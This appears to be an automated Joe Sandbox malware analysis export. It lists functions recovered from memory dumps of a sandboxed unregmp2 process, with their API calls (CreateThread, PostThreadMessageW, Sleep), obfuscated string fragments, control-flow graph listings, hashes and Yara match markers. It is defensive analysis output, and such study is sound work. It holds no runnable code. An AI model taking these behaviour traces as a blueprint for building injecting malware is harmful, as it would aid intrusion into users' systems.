                  Function 04D42D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 736477142b363110a1c754ebdb0b6c20af6eda9f3016b1e1ad681a76e1d4e25d
                  • Instruction ID: 55db90c74a9e1f1af6b4c626462c0f325c716d6255521fa07dc0ba3b7b9c0c39
                  • Opcode Fuzzy Hash: 736477142b363110a1c754ebdb0b6c20af6eda9f3016b1e1ad681a76e1d4e25d
                  • Instruction Fuzzy Hash: 4090022130140003F640715854186064015DBE1305F55D011F4419665CDD15D9666622
                  Function 04D42EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: c02e190a1619e49766473661c8bc728ec0fd63deaad254e7fc77007318c39984
                  • Instruction ID: 17fe83f1beca32ba590640aef7e5c36c27fd9d053de71b9eb04074de45e115c4
                  • Opcode Fuzzy Hash: c02e190a1619e49766473661c8bc728ec0fd63deaad254e7fc77007318c39984
                  • Instruction Fuzzy Hash: 4F90026120180403F6407558480460700158BD0306F55C011B6069666E8E29DD617535
                  Function 04D42E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 254e352daa65478ed69546d1fb2b44961d945c268445485631fd84a7037f2906
                  • Instruction ID: 9e12feaf99fea9e50d9eebd8ef5088f2a6b3f13584671b61e7f4168b9fabe183
                  • Opcode Fuzzy Hash: 254e352daa65478ed69546d1fb2b44961d945c268445485631fd84a7037f2906
                  • Instruction Fuzzy Hash: 7F90022160140502F60171584404616001A8BD0245F95C022B5029666ECE25DAA2B531
                  Function 04D42FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 0135e13c67eeef561a94b0484e051899f194af50666ecf29bd91277a499d0bc7
                  • Instruction ID: 786c3375037c027aeb067fbcaacd41e73e20428f51179dce58109dfab7cac71c
                  • Opcode Fuzzy Hash: 0135e13c67eeef561a94b0484e051899f194af50666ecf29bd91277a499d0bc7
                  • Instruction Fuzzy Hash: 1A900221211C0042F70075684C14B0700158BD0307F55C115B4159665CCD15D9716921
                  Function 04D42FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 2c7eaf965a4d1b151662caa6ddb0e2f35456d6c6e5ff0014db3e252cda1e5a52
                  • Instruction ID: 73443a9cfad30f18739619b3200fc98b33111e456fb92b3cf618fa2c3bfb38e2
                  • Opcode Fuzzy Hash: 2c7eaf965a4d1b151662caa6ddb0e2f35456d6c6e5ff0014db3e252cda1e5a52
                  • Instruction Fuzzy Hash: 1E900221601400426640716888449064015AFE1215755C121B499D661D8959D9756A65
                  Function 04D42F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 367c425c771c53c8611aa7b6b2ea6448a90f3e7fec5e67e235871b6b482be3bb
                  • Instruction ID: 46e6f4c681fd907ab2211d90242a25aa28ba67c2cf0ca9afe79f884c90b0c0c3
                  • Opcode Fuzzy Hash: 367c425c771c53c8611aa7b6b2ea6448a90f3e7fec5e67e235871b6b482be3bb
                  • Instruction Fuzzy Hash: AD90026134140442F60071584414B060015CBE1305F55C015F5069665D8A19DD627526
                  Function 04D42AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 990214498b13b0c40a944ff9c08f717658fd4b4705318d6d80bbaed9be712e0b
                  • Instruction ID: 2f7498f57dcaa3ef0cd54417a6e91c350a613d89ba1d01f41bd50439f835f721
                  • Opcode Fuzzy Hash: 990214498b13b0c40a944ff9c08f717658fd4b4705318d6d80bbaed9be712e0b
                  • Instruction Fuzzy Hash: D5900225211400032605B558070450700568BD5355355C021F501A661CDA21D9716521
                  Function 04D42AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 1464ce7f1a24e8aa9305879e7114b31e8239d246c95a0a01b9a82a77f24c2af2
                  • Instruction ID: 38f735042c0e6dd6cb9ea1dc1142861bcb5545827de35578a57d7c2cd35e1a98
                  • Opcode Fuzzy Hash: 1464ce7f1a24e8aa9305879e7114b31e8239d246c95a0a01b9a82a77f24c2af2
                  • Instruction Fuzzy Hash: 58900225221400022645B558060450B04559BD6355395C015F541B6A1CCA21D9756721
                  Function 04D42BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: bccdc0d0ffd4b0e28a38bfca59d25947486ef4acd43b3326d60ad9836851d9db
                  • Instruction ID: d3e96fedc250ba68b6350e69c8cdc56cb141f6f5920d6ef8568273704270e421
                  • Opcode Fuzzy Hash: bccdc0d0ffd4b0e28a38bfca59d25947486ef4acd43b3326d60ad9836851d9db
                  • Instruction Fuzzy Hash: AC90023120140802F6807158440464A00158BD1305F95C015B402A765DCE15DB697BA1
                  Function 04D42BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 44f088f76123ed5092e5282c834bcbc7d565fe8bfb8e459442914f497d5fa50c
                  • Instruction ID: 0b77e0e50139ec4d8a2cd3021d3b888cfe73b3f950ebb40af80d6f6e579e8bb5
                  • Opcode Fuzzy Hash: 44f088f76123ed5092e5282c834bcbc7d565fe8bfb8e459442914f497d5fa50c
                  • Instruction Fuzzy Hash: 1C90023120544842F64071584404A4600258BD0309F55C011B40697A5D9A25DE65BA61
                  Function 04D42BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: d87f3b88324d2495e149e0ef73197f932522c2f06e39626acf462451c96afff3
                  • Instruction ID: 4346076bc87d7aada55e50ab46744ab11ce909c729df7193534c60b5ab4588c7
                  • Opcode Fuzzy Hash: d87f3b88324d2495e149e0ef73197f932522c2f06e39626acf462451c96afff3
                  • Instruction Fuzzy Hash: D990023160540802F6507158441474600158BD0305F55C011B4029765D8B55DB657AA1
                  Function 04D42B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 94c9dd0d0688a43e40ebdf0883f27c1bc21c70e07ddf930b4659f3a0335fc801
                  • Instruction ID: 401dc31800518506dcc739a325185712f2e9f8bd2fd3869ce117502eaf6fe026
                  • Opcode Fuzzy Hash: 94c9dd0d0688a43e40ebdf0883f27c1bc21c70e07ddf930b4659f3a0335fc801
                  • Instruction Fuzzy Hash: 6890026120240003660571584414616401A8BE0205B55C021F50196A1DC925D9A17525
                  Function 04D435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: cbcdfc4c0c65c3db0b1031ed8a93ba423dc292de8a97abfd0b4ccc880fc3c02d
                  • Instruction ID: 5d945eeddd0c7dee02acfa699a6ec8f3c0eeb2543da16cfdbc10e2d2c8ae9e92
                  • Opcode Fuzzy Hash: cbcdfc4c0c65c3db0b1031ed8a93ba423dc292de8a97abfd0b4ccc880fc3c02d
                  • Instruction Fuzzy Hash: 1590023160550402F6007158451470610158BD0205F65C411B4429679D8B95DA6179A2
                  Function 04D439B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 57244e2a06cd7f0074ff5f107e5e17467a521bf45b13bfcf7300e52b11b48357
                  • Instruction ID: 06a832712b3e68bb566ace56603c2d4fd4f1b98c9a7c9105571ca5d3acd5fe04
                  • Opcode Fuzzy Hash: 57244e2a06cd7f0074ff5f107e5e17467a521bf45b13bfcf7300e52b11b48357
                  • Instruction Fuzzy Hash: 7F90022124545102F650715C44046164015ABE0205F55C021B48196A5D8955D9657621
                  Function 00BC97A6 Relevance: 73.7, APIs: 1, Strings: 41, Instructions: 183threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 bc97a6-bc97ae 1 bc974e-bc9781 call bc1410 call be1260 0->1 2 bc97b0-bc9c24 0->2 19 bc97a0-bc97a5 1->19 20 bc9783-bc979f call beb4c7 CreateThread 1->20 4 bc9c2e-bc9c35 2->4 6 bc9c5c-bc9c63 4->6 7 bc9c37-bc9c5a 4->7 9 bc9c8a-bc9c94 6->9 10 bc9c65-bc9c88 6->10 7->4 11 bc9ca5-bc9cb1 9->11 10->6 13 bc9ccf-bc9cd9 11->13 14 bc9cb3-bc9cbf 11->14 18 bc9cea-bc9cf4 13->18 16 bc9ccd 14->16 17 bc9cc1-bc9cc7 14->17 16->11 17->16 22 bc9d0a-bc9d11 18->22 23 bc9cf6-bc9d08 18->23 27 bc9d18-bc9d1c 22->27 23->18 28 bc9d1e-bc9d48 27->28 29 bc9d4a-bc9d54 27->29 28->27 30 bc9d65-bc9d71 29->30 31 bc9d88-bc9d99 30->31 32 bc9d73-bc9d86 30->32 33 bc9daa-bc9db3 31->33 32->30 35 bc9db5-bc9dc4 33->35 36 bc9dc6-bc9dcf 33->36 35->33 37 bca118-bca122 36->37 38 bc9dd5-bc9ddf 36->38 41 bca133-bca13c 37->41 40 bc9df0-bc9dfc 38->40 42 bc9e0c-bc9e10 40->42 43 bc9dfe-bc9e0a 40->43 44 bca13e-bca14e 41->44 45 bca15b-bca162 41->45 47 bc9e39-bc9e43 42->47 48 bc9e12-bc9e37 42->48 43->40 49 bca159 44->49 50 bca150-bca156 44->50 51 bca168-bca16f 45->51 52 bca272-bca27c 45->52 55 bc9e54-bc9e5d 47->55 48->42 49->41 50->49 53 bca194-bca19b 51->53 54 bca171-bca187 51->54 59 bca19d-bca1af 53->59 60 bca1c5-bca1cf 53->60 57 bca189-bca18f 54->57 58 bca192 54->58 61 bc9e5f-bc9e6b 55->61 62 bc9e7b-bc9e82 55->62 57->58 58->51 65 bca1b6-bca1b8 59->65 66 bca1b1-bca1b5 59->66 67 bca1e0-bca1e9 60->67 68 bc9e6d-bc9e73 61->68 69 bc9e79 61->69 63 bc9eb4-bc9ebe 62->63 64 bc9e84-bc9eb2 62->64 71 bc9ecf-bc9edb 63->71 64->62 72 bca1ba-bca1c0 65->72 73 bca1c3 65->73 66->65 74 bca1ff-bca20b 67->74 75 bca1eb-bca1fd 67->75 68->69 69->55 76 bc9edd-bc9eef 71->76 77 bc9ef1-bc9ef8 71->77 72->73 73->53 79 bca20d-bca22e 74->79 80 bca230 call be9b60 74->80 75->67 76->71 83 bc9f4a-bc9f4d 77->83 84 bc9efa-bc9f1a 77->84 79->74 85 bca235-bca23f 80->85 88 bc9f53-bc9f5a 83->88 86 bc9f1c-bc9f20 84->86 87 bc9f21-bc9f23 84->87 89 bca250-bca25c 85->89 86->87 90 bc9f34-bc9f48 87->90 91 bc9f25-bc9f2e 87->91 92 bc9f5c-bc9f8f 88->92 93 bc9f91-bc9f9e 88->93 89->52 95 bca25e-bca270 89->95 90->77 91->90 92->88 94 bc9fa4-bc9fab 93->94 96 bc9fdc-bc9feb 94->96 97 bc9fad-bc9fda 94->97 95->89 99 bc9fed 96->99 100 bc9ff2-bc9ffe 96->100 97->94 99->37 101 bca000-bca021 100->101 102 bca023-bca02d 100->102 101->100 103 bca02f-bca04e 102->103 104 bca061-bca06b 102->104 105 bca05f 103->105 106 bca050-bca059 103->106 107 bca07c-bca088 104->107 105->102 106->105 108 bca08a-bca099 107->108 109 bca09b-bca0a5 107->109 108->107 110 bca0b6-bca0bf 109->110 112 bca0cf-bca0e3 110->112 113 bca0c1-bca0cd 110->113 115 bca0f4-bca100 112->115 113->110 116 bca102-bca111 115->116 117 bca113 115->117 116->115 117->36
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00BC9795
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID: !$"X$#z$'$'r$)$+`$-Q$/$2u$6Z$:$<l$B?$E$H$H$J$M-$P$PT$S$[$\U$]$]$c$cq$d$gu$h$k$l!$p$q8$xC$y${$|$'$0
                  • API String ID: 2422867632-1502332348
                  • Opcode ID: ff602d26d9f6cf80c9d79c864edeb503f59450b53307c05347d260f823fcda33
                  • Instruction ID: 2c110a492308748d58a69bb69a87471c38cd090b0170a906e5ff3d3a1a55d338
                  • Opcode Fuzzy Hash: ff602d26d9f6cf80c9d79c864edeb503f59450b53307c05347d260f823fcda33
                  • Instruction Fuzzy Hash: E2B15BB0D05769DBEB608F45CD597DEBAB0BB05308F1081D9D15C3B281CBBA1A89CF95
                  Function 00BD096E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 559 bd096e-bd0975 560 bd0977-bd0978 559->560 561 bd09e0-bd09e9 559->561 562 bd0a5d-bd0aaa call bea980 call bd4410 call bc1410 call be1260 561->562 563 bd09eb-bd0a10 561->563 572 bd0aac-bd0abb PostThreadMessageW 562->572 573 bd0aca-bd0ad0 562->573 563->562 572->573 574 bd0abd-bd0ac7 572->574 574->573
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 7454168B$7454168B
                  • API String ID: 0-2062695193
                  • Opcode ID: eb29f3346ce0dfc0abc71e2db90ff159bc60dc48cf0b0c659f5e24b8758ec31c
                  • Instruction ID: 323ac1fba65866eb115fb74b3ed654dd87fa41a5294f9823419dae288b55c7bf
                  • Opcode Fuzzy Hash: eb29f3346ce0dfc0abc71e2db90ff159bc60dc48cf0b0c659f5e24b8758ec31c
                  • Instruction Fuzzy Hash: 73115B7690125C7ADB02ABA48C82EEEF7ACDB81344F4580A4F500AB202D7398D024B91
                  Function 00BD09C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 575 bd09c5-bd0aaa call bea980 call bd4410 call bc1410 call be1260 586 bd0aac-bd0abb PostThreadMessageW 575->586 587 bd0aca-bd0ad0 575->587 586->587 588 bd0abd-bd0ac7 586->588 588->587
                  APIs
                  • PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00BD0AB7
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 7454168B$7454168B
                  • API String ID: 1836367815-2062695193
                  • Opcode ID: ca348407d5b1944811bfe4eadfca62e965c58c39670b4a0310f8f54c236a6000
                  • Instruction ID: 724cf46638d49f9abd82622a2569237a84d84869a5702a2da757987c30b04739
                  • Opcode Fuzzy Hash: ca348407d5b1944811bfe4eadfca62e965c58c39670b4a0310f8f54c236a6000
                  • Instruction Fuzzy Hash: 84116BB2901248BBCB019BA08C81DFFB7BCEF40398F4184E9F900BB201D7345E068BA0
                  Function 00BD0A38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 589 bd0a38-bd0aaa call be9f70 call bea980 call bd4410 call bc1410 call be1260 601 bd0aac-bd0abb PostThreadMessageW 589->601 602 bd0aca-bd0ad0 589->602 601->602 603 bd0abd-bd0ac7 601->603 603->602
                  APIs
                  • PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00BD0AB7
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 7454168B$7454168B
                  • API String ID: 1836367815-2062695193
                  • Opcode ID: a8c304efd5c02d92ecfb49fb5b7ee7b242346f5fbdbb4abecb6768fee03ccac6
                  • Instruction ID: 6e4f8398dff9e4c185b0b6b902922743aaa491ea7f2a6b108cd320a499a3c4f0
                  • Opcode Fuzzy Hash: a8c304efd5c02d92ecfb49fb5b7ee7b242346f5fbdbb4abecb6768fee03ccac6
                  • Instruction Fuzzy Hash: 700108B2C0124C7AEB10ABD48C82DEFBBBCDF40394F0584A4FA04A7241E6345E068BA1
                  Function 00BD0A40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 604 bd0a40-bd0a52 605 bd0a5a-bd0aaa call bea980 call bd4410 call bc1410 call be1260 604->605 606 bd0a55 call be9f70 604->606 616 bd0aac-bd0abb PostThreadMessageW 605->616 617 bd0aca-bd0ad0 605->617 606->605 616->617 618 bd0abd-bd0ac7 616->618 618->617
                  APIs
                  • PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00BD0AB7
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 7454168B$7454168B
                  • API String ID: 1836367815-2062695193
                  • Opcode ID: b60be7116bc06f8b8b93d5cefc255e95bb917c2f1948d5dfb75a831db110d307
                  • Instruction ID: a9c4be7afb938a30a5c8363fd7cb0d898cec34e6dee36d3e7e0f92e94a3491be
                  • Opcode Fuzzy Hash: b60be7116bc06f8b8b93d5cefc255e95bb917c2f1948d5dfb75a831db110d307
                  • Instruction Fuzzy Hash: 9E01DBB5D0124C7ADB11A7D58C82DEFBBBCDF41794F4580A5F904B7241D6345E068BB1
                  Function 00BE2B40 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                  Download Yara Rule
                  APIs
                  • Sleep.KERNELBASE(000007D0), ref: 00BE2C0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID: net.dll$wininet.dll
                  • API String ID: 3472027048-1269752229
                  • Opcode ID: 19a28b8466f8829b74efd31151b63adb97cc94ea97e461d3178ffe3d36e729e9
                  • Instruction ID: dee201a7498c8d9902e398f5485db89a2804a046ba0bd591110a614efd938a68
                  • Opcode Fuzzy Hash: 19a28b8466f8829b74efd31151b63adb97cc94ea97e461d3178ffe3d36e729e9
                  • Instruction Fuzzy Hash: 9F318DB1600304BBC718DF65D885FEBBBE8FB88704F10866DBA595B245D770BA44CBA4
                  Function 00BDEBB0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                  Download Yara Rule
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 00BDEBC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
